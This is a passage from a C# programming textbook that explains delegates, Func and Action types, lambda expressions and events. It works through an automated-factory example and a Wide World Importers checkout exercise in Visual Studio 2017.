the signature of the delegate, and you cannot invoke a delegate that does
not refer to a valid method.
Examples of delegates in the .NET Framework class
library
The Microsoft .NET Framework class library makes extensive use of
delegates for many of its types, two examples of which are in Chapter 18,
“Using collections”: the Find method and the Exists method of the List<T>
class. If you recall, these methods search through a List<T> collection, either
returning a matching item or testing for the existence of a matching item.
When the designers of the List<T> class were implementing it, they had
absolutely no idea about what should actually constitute a match in your
application code, so they let you define that by providing your own code in
the form of a predicate. A predicate is really just a delegate that happens to
return a Boolean value.
The following code should help to remind you how to use the Find
method:
struct Person
{
public int ID { get; set; }
public string Name { get; set; }
public int Age { get; set; }
}
...
List<Person> personnel = new List<Person>()
{
new Person() { ID = 1, Name = "John", Age = 53 },
new Person() { ID = 2, Name = "Sid", Age = 28 },
new Person() { ID = 3, Name = "Fred", Age = 34 },
new Person() { ID = 4, Name = "Paul", Age = 22 }
};
...
// Find the member of the list that has an ID of 3
Person match = personnel.Find(p => p.ID == 3);
Other examples of methods exposed by the List<T> class that use
delegates to perform their operations are Average, Max, Min, Count, and
Sum. These methods take a Func delegate as the parameter. A Func delegate
refers to a method that returns a value (a function). In the following
examples, the Average method is used to calculate the average age of items in
the personnel collection (the Func<T> delegate simply returns the value in
the Age field of each item in the collection), the Max method is used to
determine the item with the highest ID, and the Count method calculates how
many items have an Age between 30 and 39 inclusive.
double averageAge = personnel.Average(p => p.Age);
Console.WriteLine($"Average age is {averageAge}");
...
int id = personnel.Max(p => p.ID);
Console.WriteLine($"Person with highest ID is {id}");
...
int thirties = personnel.Count(p => p.Age >= 30 && p.Age <= 39);
Console.WriteLine($"Number of personnel in their thirties is {thirties}");
This code generates the following output:
Average age is 34.25
Person with highest ID is 4
Number of personnel in their thirties is 1
You will meet many examples of these and other delegate types used by
the .NET Framework class library throughout the remainder of this book.
You can also define your own delegates. The best way to fully understand
how and when you might want to do this is to see them in action, so next,
you’ll work through an example.
The Func<T, …> and Action<T, …> delegate types
The parameter taken by the Average, Max, Count, and other methods of
the List<T> class is actually a generic Func<T, TResult> delegate; the
type parameters refer to the type of the parameter passed to the delegate
and the type of the return value. For the Average, Max, and Count
methods of the List<Person> class shown in the text, the first type
parameter T is the type of data in the list (the Person struct), whereas
the TResult type parameter is determined by the context in which the
delegate is used. In the following example, the type of TResult is int
because the value returned by the Count method should be an integer:
int thirties = personnel.Count(p => p.Age >= 30 && p.Age <= 39);
So, in this example, the type of the delegate expected by the Count
method is Func<Person, int>.
This point might seem somewhat academic because the compiler
automatically generates the delegate based on the type of the List<T>,
but it is worth familiarizing yourself with this idiom as it occurs time
and again throughout the .NET Framework class library. In fact, the
System namespace defines an entire family of Func delegate types, from
Func<TResult> for functions that return a result without taking any
parameters to Func<T1, T2, T3, T4, …, T16, TResult> for functions that
take 16 parameters. If you find yourself in a situation in which you are
creating your own delegate type that matches this pattern, you should
consider using an appropriate Func delegate type instead. You will meet
the Func delegate types again in Chapter 21, “Querying in-memory data
by using query expressions.”
Alongside Func, the System namespace also defines a series of
Action delegate types. An Action delegate is used to reference a method
that performs an action instead of returning a value (a void method).
Again, a family of Action delegate types is available ranging from
Action<T> (specifying a delegate that takes a single parameter) to
Action<T1, T2, T3, T4, …, T16>.
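To make the distinction concrete, here is a minimal sketch that declares a Func variable and an Action variable directly. It reuses the Person struct shown earlier in this chapter; the variable names and the sample data are illustrative:

Func<Person, int> getAge = p => p.Age;                  // takes a Person, returns an int
Action<string> report = msg => Console.WriteLine(msg);  // takes a string, returns nothing

int age = getAge(new Person { ID = 5, Name = "Diana", Age = 41 });
report($"Age is {age}"); // displays "Age is 41"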
The automated factory scenario
Suppose you are writing the control systems for an automated factory. The
factory contains a large number of different machines, each performing
distinct tasks in the production of the articles manufactured by the factory—
shaping and folding metal sheets, welding sheets together, painting sheets,
and so on. Each machine was built and installed by a specialist vendor. The
machines are all controlled by a computer, and each vendor has provided a
set of functions that you can use to control its machine. Your task is to
integrate the different systems used by the machines into a single control
program. One aspect on which you have decided to concentrate is to provide
a means of shutting down all the machines—quickly, if needed!
Each machine has its own unique computer-controlled process (and
functions) for shutting down safely, as summarized here:
StopFolding(); // Folding and shaping machine
FinishWelding(); // Welding machine
PaintOff(); // Painting machine
Implementing the factory control system without using
delegates
A simple approach to implementing the shutdown functionality in the control
program is as follows:
class Controller
{
// Fields representing the different machines
private FoldingMachine folder;
private WeldingMachine welder;
private PaintingMachine painter;
...
public void ShutDown()
{
folder.StopFolding();
welder.FinishWelding();
painter.PaintOff();
}
...
}
Although this approach works, it is not very extensible or flexible. If the
factory buys a new machine, you must modify this code; the Controller class
and the code for managing the machines are tightly coupled.
Implementing the factory by using a delegate
Although the names of each method are different, they all have the same
“shape”: they take no parameters, and they do not return a value. (You’ll
consider what happens if this isn’t the case later, so bear with me.) The
general format of each method, therefore, is this:
void methodName();
This is where a delegate can be useful. You can use a delegate that
matches this shape to refer to any of the machinery shutdown methods. You
declare a delegate like this:
delegate void stopMachineryDelegate();
Note the following points:
You use the delegate keyword.
You specify the return type (void in this example), a name for the
delegate (stopMachineryDelegate), and any parameters (there are none
in this case).
After you have declared the delegate, you can create an instance and make
it refer to a matching method by using the += compound assignment operator.
You can do this in the constructor of the controller class like this:
class Controller
{
delegate void stopMachineryDelegate(); // the delegate type
private stopMachineryDelegate stopMachinery; // an instance of the delegate
...
public Controller()
{
this.stopMachinery += folder.StopFolding;
}
...
}
It takes a bit of study to get used to this syntax. You add the method to the
delegate—remember that you are not actually calling the method at this point.
The + operator is overloaded to have this new meaning when used with
delegates. (You will learn more about operator overloading in Chapter 22,
“Operator overloading.”) Notice that you simply specify the method name
and do not include any parentheses or parameters.
It is safe to use the += operator on an uninitialized delegate. It will be
initialized automatically. Alternatively, you can use the new keyword to
initialize a delegate explicitly with a single specific method, like this:
this.stopMachinery = new stopMachineryDelegate(folder.StopFolding);
You can call the method by invoking the delegate, like this:
public void ShutDown()
{
this.stopMachinery();
...
}
You use the same syntax to invoke a delegate as you use to call a method.
If the method that the delegate refers to takes any parameters, you should
specify them at this time between the parentheses.
Note If you attempt to invoke a delegate that is uninitialized and does
not refer to any methods, you will get a NullReferenceException
exception.
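One way to guard against this exception is to test the delegate before invoking it. The following is a minimal sketch of such a check in the ShutDown method (not part of the exercise code); in C# 6.0 and later, the null-conditional operator expresses the same test more concisely:

public void ShutDown()
{
    // Only invoke the delegate if at least one method has been added to it
    if (this.stopMachinery != null)
    {
        this.stopMachinery();
    }

    // Equivalent shorthand from C# 6.0 onward:
    // this.stopMachinery?.Invoke();
}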
An important advantage of using a delegate is that it can refer to more
than one method at the same time. You simply use the += operator to add
methods to the delegate, like this:
public Controller()
{
this.stopMachinery += folder.StopFolding;
this.stopMachinery += welder.FinishWelding;
this.stopMachinery += painter.PaintOff;
}
Invoking this.stopMachinery() in the Shutdown method of the Controller
class automatically calls each of the methods in turn. The Shutdown method
does not need to know how many machines there are or what the method
names are.
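To see the whole mechanism in one place, the following self-contained sketch uses trivial stand-in machine classes (the class bodies and console messages are illustrative, not the book's exercise code):

using System;

delegate void stopMachineryDelegate();

class FoldingMachine { public void StopFolding() => Console.WriteLine("Folding stopped"); }
class WeldingMachine { public void FinishWelding() => Console.WriteLine("Welding finished"); }
class PaintingMachine { public void PaintOff() => Console.WriteLine("Painting off"); }

class FactoryDemo
{
    static void Main()
    {
        stopMachineryDelegate stopMachinery = null;

        FoldingMachine folder = new FoldingMachine();
        WeldingMachine welder = new WeldingMachine();
        PaintingMachine painter = new PaintingMachine();

        stopMachinery += folder.StopFolding;
        stopMachinery += welder.FinishWelding;
        stopMachinery += painter.PaintOff;

        stopMachinery(); // calls all three methods, in the order they were added
    }
}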
You can remove a method from a delegate by using the -= compound
assignment operator, as demonstrated here:
this.stopMachinery -= folder.StopFolding;
The current scheme adds the machine methods to the delegate in the
Controller constructor. To make the Controller class totally independent of
the various machines, you need to make the stopMachineryDelegate type
public and supply a means of enabling classes outside Controller to add
methods to the delegate. You have several options:
Make the stopMachinery delegate variable public:
public stopMachineryDelegate stopMachinery;
Keep the stopMachinery delegate variable private, but create a
read/write property to provide access to it:
private stopMachineryDelegate stopMachinery;
...
public stopMachineryDelegate StopMachinery
{
get => this.stopMachinery;
set => this.stopMachinery = value;
}
Provide complete encapsulation by implementing separate Add and
Remove methods. The Add method takes a method as a parameter and
adds it to the delegate, whereas the Remove method removes the
specified method from the delegate (notice that you specify a method
as a parameter by using a delegate type):
public void Add(stopMachineryDelegate stopMethod) =>
this.stopMachinery += stopMethod;
public void Remove(stopMachineryDelegate stopMethod) =>
this.stopMachinery -= stopMethod;
An object-oriented purist would probably opt for the Add/Remove
approach. However, the other approaches are viable alternatives that are
frequently used, which is why they are shown here.
Whichever technique you choose, you should remove the code that adds
the machine methods to the delegate from the Controller constructor. You
can then instantiate a Controller and objects representing the other machines
like this (this example uses the Add/Remove approach):
Controller control = new Controller();
FoldingMachine folder = new FoldingMachine();
WeldingMachine welder = new WeldingMachine();
PaintingMachine painter = new PaintingMachine();
...
control.Add(folder.StopFolding);
control.Add(welder.FinishWelding);
control.Add(painter.PaintOff);
...
control.ShutDown();
...
Declaring and using delegates
In the following exercises, you will complete an application that forms part of
a system for a company called Wide World Importers. Wide World Importers
imports and sells building materials and tools, and the application that you
will be working on gives customers the ability to browse the items that Wide
World Importers currently has in stock and place orders for these items. The
application contains a form that displays the goods currently available,
together with a pane that lists the items that a customer has selected. When
the customer wants to place an order, she can click the Checkout button on
the form. The order is then processed, and the pane is cleared.
Currently, when the customer places an order, several actions occur:
Payment is requested from the customer.
The items in the order are examined, and if any of them are age
restricted (such as the power tools), details of the order are audited and
tracked.
A dispatch note is generated for shipping purposes. This dispatch note
contains a summary of the order.
The logic for the auditing and shipping processes is independent of the
checkout logic, although the order in which these processes occur is
immaterial. Furthermore, either of these elements might be amended in the
future, and additional processing might be required by the checkout operation
as business circumstances or regulatory requirements change in the future.
Therefore, it is desirable to decouple the payment and checkout logic from
the auditing and shipping processes to make maintenance and upgrades
easier. You will start by examining the application to see how it currently
fails to fulfill this objective. You will then modify the structure of the
application to remove the dependencies between the checkout logic and the
auditing and shipping logic.
Examine the Wide World Importers application
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Delegates solution, which is located in the \Microsoft
Press\VCSBS\Chapter 20\Delegates folder in your Documents folder.
3. On the Debug menu, click Start Debugging.
The project builds and runs. A form appears displaying the items
available, together with a panel showing the details of the order (it is
empty initially). The app displays the items in a GridView control that
scrolls horizontally.
4. Select one or more items and then click Add to include them in the
shopping basket. Be sure that you select at least one age-restricted item.
As you add an item, it appears in the Order Details pane on the right.
Notice that if you add the same item more than once, the quantity is
incremented for each click. (This version of the application does not
implement functionality to remove items from the basket.) Note that the
currency used by the application depends on your locale; I am based in
the UK, so the values displayed in the image below are in Sterling.
However, if you are in the United States, you will see values in Dollars.
5. In the Order Details pane, click Checkout.
A message appears indicating that the order has been placed. The order
is given a unique ID, and this ID is displayed together with the value of
the order.
6. Click Close to dismiss the message, and then return to the Visual Studio
2017 environment and stop debugging.
7. In Solution Explorer, expand the Delegates project node, and then open
the Package.appxmanifest file.
The package manifest editor appears.
8. In the package manifest editor, click the Packaging tab.
Note the value in the Package Name field. It takes the form of a globally
unique identifier (GUID).
9. Using File Explorer, browse to
%USERPROFILE%\AppData\Local\Packages\yyy\LocalState, where
yyy is an identifier value that begins with the GUID you noted in the
previous step. This is the local folder for the Wide World Importers
application. You should see two files, one named audit-nnnnnn.xml
(where nnnnnn is the ID of the order displayed earlier), and the other
dispatch-nnnnnn.txt. The first file was generated by the auditing
component of the app, and the second file is the dispatch note generated
by the shipping component.
Note If there is no audit-nnnnnn.xml file, then you did not select
any age-restricted items when you placed the order. In this case,
switch back to the application and create a new order that includes
one or more of these items.
10. Open the audit-nnnnnn.xml file by using Visual Studio. This file
contains a list of the age-restricted items in the order together with the
order number and date. The file is in XML format and should look
similar to this:
Close the file in Visual Studio when you finish examining this list.
11. Open the dispatch-nnnnnn.txt file by using Notepad. This file contains a
summary of the order, listing the order ID and the value. This is an
ordinary text file and should look similar to this:
Close Notepad when you have finished examining this file, and return to Visual Studio 2017.
12. In Visual Studio, notice that the solution consists of the following
projects:
• Delegates This project contains the application itself. The
MainPage.xaml file defines the user interface, and the application logic
is contained in the MainPage.xaml.cs file.
• AuditService This project contains the component that implements
the auditing process. It is packaged as a class library and contains a
single class named Auditor. This class exposes a single public method,
AuditOrder, that examines an order and generates the audit-
nnnnnn.xml file if the order contains any age-restricted items.
• DeliveryService This project contains the component that performs
the shipping logic, packaged as a class library. The shipping
functionality is contained in the Shipper class, and it provides a public
method named ShipOrder that handles the shipping process and also
generates the dispatch note.
Note You are welcome to examine the code in the Auditor and
Shipper classes, but it is not necessary to fully understand the inner
workings of these components in this application.
• DataTypes This project contains the data types used by the other
projects. The Product class defines the details of the products
displayed by the application, and the data for the products is held in the
ProductsDataSource class. (The application currently uses a small
hard-coded set of products. In a production system, this information
would be retrieved from a database or web service.) The Order and
OrderItem classes implement the structure of an order; each order
contains one or more order items.
13. In the Delegates project, display the MainPage.xaml.cs file in the Code
and Text Editor window and examine the private fields and MainPage
constructor in this file. The important elements look like this:
...
private Auditor auditor = null;
private Shipper shipper = null;
public MainPage()
{
...
this.auditor = new Auditor();
this.shipper = new Shipper();
}
The auditor and shipper fields contain references to instances of the
Auditor and Shipper classes, and the constructor instantiates these
objects.
14. Locate the CheckoutButtonClicked method. This method runs when the
user clicks Checkout to place an order. The first few lines look like this:
private void CheckoutButtonClicked(object sender,
RoutedEventArgs e)
{
try
{
// Perform the checkout processing
if (this.requestPayment())
{
this.auditor.AuditOrder(this.order);
this.shipper.ShipOrder(this.order);
}
...
}
...
}
This method implements the checkout processing. It requests payment
from the customer and then invokes the AuditOrder method of the
auditor object followed by the ShipOrder method of the shipper object.
Any additional business logic required in the future can be added here.
The remainder of the code in this method (after the if statement) is
concerned with managing the user interface: displaying the message box
to the user and clearing out the Order Details pane.
Note For simplicity, the requestPayment method in this application
currently just returns true to indicate that payment has been received. In
the real world, this method would perform the complete payment
processing and verification.
Although the application operates as advertised, the Auditor and Shipper
components are tightly integrated into the checkout processing. If these
components change, the application will need to be updated. Similarly, if you
need to incorporate additional logic into the checkout process, possibly
performed by using other components, you will need to amend this part of the
application.
In the next exercise, you will see how you can decouple the business
processing for the checkout operation from the application. The checkout
processing will still need to invoke the Auditor and Shipper components, but
it must be extensible enough to allow additional components to be easily
incorporated. You will achieve this by creating a component called
CheckoutController. The CheckoutController component will implement the
business logic for the checkout process and expose a delegate that enables an
application to specify which components and methods should be included
within this process. The CheckoutController component will invoke these
methods by using the delegate.
Create the CheckoutController component
1. In Solution Explorer, right-click the Delegates solution, point to Add,
and then click New Project.
2. In the Add New Project dialog box, in the left pane, under Visual C#,
click the Windows Universal node. In the middle pane, select the Class
Library (Universal Windows) template. In the Name box, type
CheckoutService, and then click OK.
3. In the New Universal Windows Project dialog box, accept the default
values for Target Version and Minimum Version, and then click OK.
4. In Solution Explorer, expand the CheckoutService project, right-click
the file Class1.cs, and then click Rename. Change the name of the file to
CheckoutController.cs and then press Enter. Allow Visual Studio to
rename all references to Class1 as CheckoutController when prompted.
5. Right-click the References node in the CheckoutService project, and
then click Add Reference.
6. In the Reference Manager - CheckoutService dialog box, in the left
pane, click Solution. In the middle pane, select the DataTypes project,
and then click OK.
The CheckoutController class will use the Order class defined in the
DataTypes project.
7. In the Code and Text Editor window displaying the
CheckoutController.cs file, add the following using directive to the list
at the top of the file:
using DataTypes;
8. Add a public delegate type called CheckoutDelegate to the
CheckoutController class, as shown in the following in bold:
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
}
You can use this delegate type to reference methods that take an Order
parameter and that do not return a result. This just happens to match the
shape of the AuditOrder and ShipOrder methods of the Auditor and
Shipper classes.
9. Add a public delegate called CheckoutProcessing based on this delegate
type, like this:
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
public CheckoutDelegate CheckoutProcessing = null;
}
10. Display the MainPage.xaml.cs file of the Delegates project in the Code
and Text Editor window and locate the requestPayment method (it is at
the end of the file). Cut this method from the MainPage class. Return to
the CheckoutController.cs file, and paste the requestPayment method
into the CheckoutController class, as shown in bold in the following:
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
public CheckoutDelegate CheckoutProcessing = null;
private bool requestPayment()
{
// Payment processing goes here
// Payment logic is not implemented in this example
// - simply return true to indicate payment has been received
return true;
}
}
11. Add the StartCheckoutProcessing method shown below in bold to the
CheckoutController class:
public class CheckoutController
{
public delegate void CheckoutDelegate(Order order);
public CheckoutDelegate CheckoutProcessing = null;
private bool requestPayment()
{
...
}
public void StartCheckoutProcessing(Order order)
{
// Perform the checkout processing
if (this.requestPayment())
{
if (this.CheckoutProcessing != null)
{
this.CheckoutProcessing(order);
}
}
}
}
This method provides the checkout functionality previously
implemented by the CheckoutButtonClicked method of the MainPage
class. It requests payment and then examines the CheckoutProcessing
delegate; if this delegate is not null (it refers to one or more methods), it
invokes the delegate. Any methods referenced by this delegate will run
at this point.
12. In Solution Explorer, in the Delegates project, right-click the References
node and then click Add Reference.
13. In the Reference Manager - Delegates dialog box, in the left pane, click
Solution. In the middle pane, select the CheckoutService project, and
then click OK (leave the other projects selected as well).
14. Return to the MainPage.xaml.cs file of the Delegates project and add the
following using directive to the list at the top of the file:
using CheckoutService;
15. Add a private variable named checkoutController of type CheckoutController to the MainPage class, and initialize it to null, as shown in
bold in the following:
public ... class MainPage : ...
{
...
private Auditor auditor = null;
private Shipper shipper = null;
private CheckoutController checkoutController = null;
...
}
16. Locate the MainPage constructor. After the statements that create the
Auditor and Shipper components, instantiate the CheckoutController
component, as follows in bold:
public MainPage()
{
...
this.auditor = new Auditor();
this.shipper = new Shipper();
this.checkoutController = new CheckoutController();
}
17. After the statement you just entered, add the following statements shown
in bold to the constructor:
public MainPage()
{
...
this.checkoutController = new CheckoutController();
this.checkoutController.CheckoutProcessing +=
this.auditor.AuditOrder;
this.checkoutController.CheckoutProcessing +=
this.shipper.ShipOrder;
}
This code adds references to the AuditOrder and ShipOrder methods of
the Auditor and Shipper objects to the CheckoutProcessing delegate of
the CheckoutController object.
18. Find the CheckoutButtonClicked method. In the try block, replace the
code that performs the checkout processing (the if statement block) with
the statement shown here in bold:
private void CheckoutButtonClicked(object sender,
RoutedEventArgs e)
{
try
{
// Perform the checkout processing
this.checkoutController.StartCheckoutProcessing(this.order);
// Display a summary of the order
...
}
...
}
You have now decoupled the checkout logic from the components that
this checkout processing uses. The business logic in the MainPage class
specifies which components the CheckoutController should use.
Test the application
1. On the Debug menu, click Start Debugging to build and run the
application.
2. When the Wide World Importers form appears, select some items
(include at least one age-restricted item), and then click Checkout.
3. When the Order Placed message appears, make a note of the order
number, and then click Close.
4. Switch to File Explorer and move to the
%USERPROFILE%\AppData\Local\Packages\yyy\LocalState folder,
where yyy is an identifier value that begins with the GUID for the
application that you noted previously. Verify that a new audit-
nnnnnn.xml file and dispatch-nnnnnn.txt file have been created, where
nnnnnn is the number that identifies the new order. Examine these files
and verify that they contain the details of the order.
5. Return to Visual Studio 2017 and stop debugging.
Lambda expressions and delegates
All the examples of adding a method to a delegate that you have seen so far
use the method’s name. For example, in the automated factory scenario
described earlier, you add the StopFolding method of the folder object to the
stopMachinery delegate like this:
this.stopMachinery += folder.StopFolding;
This approach is very useful if there is a convenient method that matches
the signature of the delegate. But what if the StopFolding method actually
had the following signature:
void StopFolding(int shutDownTime); // Shut down in the specified number of seconds
This signature is now different from that of the FinishWelding and
PaintOff methods, and therefore you cannot use the same delegate to handle
all three methods. What do you do?
Creating a method adapter
One way around this problem is to create another method that calls
StopFolding, but that takes no parameters itself, like this:
void FinishFolding()
{
folder.StopFolding(0); // Shut down immediately
}
You can then add the FinishFolding method to the stopMachinery
delegate in place of the StopFolding method, using the same syntax as before:
this.stopMachinery += folder.FinishFolding;
When the stopMachinery delegate is invoked, it calls FinishFolding,
which in turn calls the StopFolding method, passing in the parameter 0.
Note The FinishFolding method is a classic example of an adapter: a
method that converts (or adapts) a method to give it a different
signature. This pattern is very common and is one of the sets of patterns
documented in the book Design Patterns: Elements of Reusable Object-
Oriented Software by Erich Gamma, Richard Helm, Ralph Johnson, and
John Vlissides (Addison-Wesley Professional, 1994).
In many cases, adapter methods such as this are small, and it is easy to
lose them in a sea of methods, especially in a large class. Furthermore, the
method is unlikely to be called except for its use in adapting the StopFolding
method for use by the delegate. C# provides lambda expressions for
situations such as this. Lambda expressions are described in Chapter 18, and
there are more examples of them earlier in this chapter. In the factory
scenario, you can use the following lambda expression:
this.stopMachinery += (() => folder.StopFolding(0));
When you invoke the stopMachinery delegate, it will run the code defined
by the lambda expression, which will, in turn, call the StopFolding method
with the appropriate parameter.
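A lambda expression can also compute the argument at the moment the delegate runs, rather than when the method is subscribed. For example (GetShutDownTime is a hypothetical helper, not part of the factory scenario, that returns the number of seconds to wait):

// The argument is evaluated each time the delegate is invoked
this.stopMachinery += (() => folder.StopFolding(this.GetShutDownTime()));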
Enabling notifications by using events
You have now seen how to declare a delegate type, call a delegate, and create
delegate instances. However, this is only half the story. Although you can
invoke any number of methods indirectly by using delegates, you still have to
invoke the delegate explicitly. In many cases, it would be useful to have the
delegate run automatically when something significant happens. For
example, in the automated factory scenario, it could be vital to be able to
invoke the stopMachinery delegate and halt the equipment if the system
detects that a machine is overheating.
The .NET Framework provides events, which you can use to define and
trap significant actions and arrange for a delegate to be called to handle the
situation. Many classes in the .NET Framework expose events. Most of the
controls that you can place on a form in a UWP app, and the Windows class
itself, use events to run code when, for example, the user clicks a button or
types something in a field. You can also declare your own events.
Declaring an event
You declare an event in a class intended to act as an event source. An event
source is usually a class that monitors its environment and raises an event
when something significant happens. In the automated factory, an event
source could be a class that monitors the temperature of each machine. The
temperature-monitoring class would raise a “machine overheating” event if it
detects that a machine has exceeded its thermal radiation boundary (that is, it
has become too hot). An event maintains a list of methods to call when it is
raised. These methods are sometimes referred to as subscribers. These
methods should be prepared to handle the “machine overheating” event and
take the necessary corrective action: shut down the machines.
You declare an event similarly to how you declare a field. However,
because events are intended to be used with delegates, the type of an event
must be a delegate, and you must prefix the declaration with the event
keyword. Use the following syntax to declare an event:
event delegateTypeName eventName
As an example, here’s the StopMachineryDelegate delegate from the
automated factory. It has been relocated to a class named
TemperatureMonitor, which provides an interface to the various electronic
probes monitoring the temperature of the equipment (this is a more logical
place for the event than the Controller class):
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
...
}
You can define the MachineOverheating event, which will invoke the
StopMachineryDelegate, like this:
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
public event StopMachineryDelegate MachineOverheating;
...
}
The logic (not shown) in the TemperatureMonitor class raises the
MachineOverheating event as necessary. (You will see how to raise an event
in an upcoming section.) Also, you add methods to an event (a process
known as subscribing to the event) rather than add them to the delegate on
which the event is based. You will look at this aspect of events next.
Subscribing to an event
Like delegates, events come ready-made with a += operator. You subscribe
to an event by using this += operator. In the automated factory, the software
controlling each machine can arrange for the shutdown methods to be called
when the MachineOverheating event is raised like this:
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
public event StopMachineryDelegate MachineOverheating;
...
}
...
TemperatureMonitor tempMonitor = new TemperatureMonitor();
...
tempMonitor.MachineOverheating += (() => { folder.StopFolding(0); });
tempMonitor.MachineOverheating += welder.FinishWelding;
tempMonitor.MachineOverheating += painter.PaintOff;
Notice that the syntax is the same as for adding a method to a delegate.
You can even subscribe by using a lambda expression. When the
tempMonitor.MachineOverheating event runs, it will call all the subscribing
methods and shut down the machines.
Unsubscribing from an event
Knowing that you use the += operator to attach a delegate to an event, you
can probably guess that you use the -= operator to detach a delegate from an
event. Calling the -= operator removes the method from the event's internal
delegate collection. This action is often referred to as unsubscribing from the
event.
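For example, to detach one of the subscriptions made earlier (a short sketch based on the factory objects from the previous example):

// The welding machine no longer responds to the event;
// the remaining subscribers are unaffected
tempMonitor.MachineOverheating -= welder.FinishWelding;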
Raising an event
You can raise an event by calling it like a method. When you raise an event,
all the attached delegates are called in sequence. For example, here’s the
TemperatureMonitor class with a private Notify method that raises the
MachineOverheating event:
class TemperatureMonitor
{
public delegate void StopMachineryDelegate();
public event StopMachineryDelegate MachineOverheating;
...
private void Notify()
{
if (this.MachineOverheating != null)
{
this.MachineOverheating();
}
}
...
}
This is a common idiom. The null check is necessary because an event
field is implicitly null and only becomes nonnull when a method subscribes
to it by using the += operator. If you try to raise a null event, you will get a
NullReferenceException exception. If the delegate defining the event expects
any parameters, the appropriate arguments must be provided when you raise
the event. You will see some examples of this later.
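As a sketch of that last point, suppose the delegate on which the event is based took the machine's temperature as a parameter (a hypothetical variation of the TemperatureMonitor class, not the version used in this chapter):

class TemperatureMonitor
{
    public delegate void StopMachineryDelegate(int temperature);
    public event StopMachineryDelegate MachineOverheating;

    private void Notify(int temperature)
    {
        // Supply an argument that matches the delegate's parameter
        if (this.MachineOverheating != null)
        {
            this.MachineOverheating(temperature);
        }
    }
}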
Important Events have a very useful built-in security feature. A public
event (such as MachineOverheating) can be raised only by methods in
the class that define it (the TemperatureMonitor class). Any attempt to
raise the event outside the class results in a compiler error.
Understanding user interface events
As mentioned earlier, the .NET Framework classes and controls used for
building GUIs employ events extensively. For example, the Button class
derives from the ButtonBase class, inheriting a public event called Click of
type RoutedEventHandler. The RoutedEventHandler delegate expects two
parameters: a reference to the object that caused the event to be raised, and a
RoutedEventArgs object that contains additional information about the event:
public delegate void RoutedEventHandler(Object sender,
RoutedEventArgs e);
The Button class looks like this:
public class ButtonBase: ...
{
public event RoutedEventHandler Click;
...
}
public class Button: ButtonBase
{
...
}
The Button class automatically raises the Click event when you click the
button on the screen. This arrangement makes it easy to create a delegate for
a chosen method and attach that delegate to the required event. The following
example shows the code for a UWP form that contains a button named okay
and the code to connect the Click event of the okay button to the okayClick
method:
partial class MainPage :
global::Windows.UI.Xaml.Controls.Page,
global::Windows.UI.Xaml.Markup.IComponentConnector,
global::Windows.UI.Xaml.Markup.IComponentConnector2
{
...
public void Connect(int connectionId, object target)
{
switch(connectionId)
{
case 1:
{
this.okay = (global::Windows.UI.Xaml.Controls.Button)
(target);
...
((global::Windows.UI.Xaml.Controls.Button)this.okay).Click
+= this.okayClick;
...
}
break;
default:
break;
}
this._contentLoaded = true;
}
...
}
This code is usually hidden from you. When you use the Design View
window in Visual Studio 2017 and set the Click property of the okay button
to okayClick in the Extensible Application Markup Language (XAML)
description of the form, Visual Studio 2017 generates this code for you. All
you have to do is write your application logic in the event-handling method,
okayClick, in the part of the code to which you do have access, which is the
MainPage.xaml.cs file in this case:
public sealed partial class MainPage : Page
{
...
private void okayClick(object sender, RoutedEventArgs e)
{
// your code to handle the Click event
}
}
The events that the various GUI controls generate always follow the same
pattern. The events are of a delegate type whose signature has a void return
type and two arguments. The first argument is always the sender (the source)
of the event, and the second argument is always an EventArgs argument (or a
class derived from EventArgs).
With the sender argument, you can reuse a single method for multiple
events. The delegated method can examine the sender argument and respond
accordingly. For example, you can use the same method to subscribe to the
Click event for two buttons. (You add the same method to two different
events.) When the event is raised, the code in the method can examine the
sender argument to ascertain which button was clicked.
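A minimal sketch of that idea follows (okButton and cancelButton are hypothetical controls that have both been wired to the same handler):

private void buttonClick(object sender, RoutedEventArgs e)
{
    // The same method is subscribed to the Click event of both buttons;
    // examine the sender argument to determine which one was clicked
    if (sender == this.okButton)
    {
        // Handle a click on the OK button
    }
    else if (sender == this.cancelButton)
    {
        // Handle a click on the Cancel button
    }
}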
Using events
In the previous exercise, you amended the Wide World Importers application
to decouple the auditing and shipping logic from the checkout process. The
CheckoutController class that you built invokes the auditing and shipping
components by using a delegate and has no knowledge about these
components or the methods it is running; this is the responsibility of the
application that creates the CheckoutController object and adds the
appropriate references to the delegate. However, it might be useful for a
component to be able to alert the application when it has completed its
processing and enable the application to perform any necessary tidying up.
This might sound a little strange at first—surely when the application
invokes the delegate in the CheckoutController object, the methods
referenced by this delegate run, and the application only continues with the
next statement when these methods have finished. But this is not necessarily
the case! Chapter 24, “Improving response time by performing asynchronous
operations,” demonstrates that methods can run asynchronously, and when
you invoke a method, it might not have completed before execution continues
with the next statement. This is especially true in UWP apps in which long-
running operations are performed on background threads to enable the user
interface to remain responsive. In the Wide World Importers application, in
the CheckoutButtonClicked method, the code that invokes the delegate is
followed by a statement that displays a dialog box with a message indicating
that the order has been placed:
private void CheckoutButtonClicked(object sender, RoutedEventArgs e)
{
try
{
// Perform the checkout processing
this.checkoutController.StartCheckoutProcessing(this.order);
// Display a summary of the order
MessageDialog dlg = new MessageDialog(...);
dlg.ShowAsync();
...
}
...
}
In fact, there is no guarantee that the processing performed by the
delegated methods has completed by the time the dialog box appears, so the
message could actually be misleading. This is where an event is invaluable.
The Auditor and Shipper components could both publish an event to which
the application subscribes. This event could be raised by the components only
when they have completed their processing. When the application receives
this event, it can display the message, safe in the knowledge that it is now
accurate.
In the following exercise, you will modify the Auditor and Shipper classes
to raise an event that occurs when they have completed their processing. The
application will subscribe to the event for each component and display an
appropriate message when the event occurs.
Add an event to the CheckoutController class
1. Return to Visual Studio 2017 and display the Delegates solution.
2. In the AuditService project, open the Auditor.cs file in the Code and
Text Editor window.
3. Add a public delegate called AuditingCompleteDelegate to the Auditor
class. This delegate should specify a method that takes a string
parameter called message and that returns a void. The code in bold in the
following example shows the definition of this delegate:
public class Auditor
{
public delegate void AuditingCompleteDelegate(string
message);
...
}
4. Add a public event called AuditProcessingComplete to the Auditor class,
after the AuditingCompleteDelegate delegate. This event should be
based on the AuditingCompleteDelegate delegate as shown in bold in
the following code:
public class Auditor
{
public delegate void AuditingCompleteDelegate(string
message);
public event AuditingCompleteDelegate
AuditProcessingComplete;
...
}
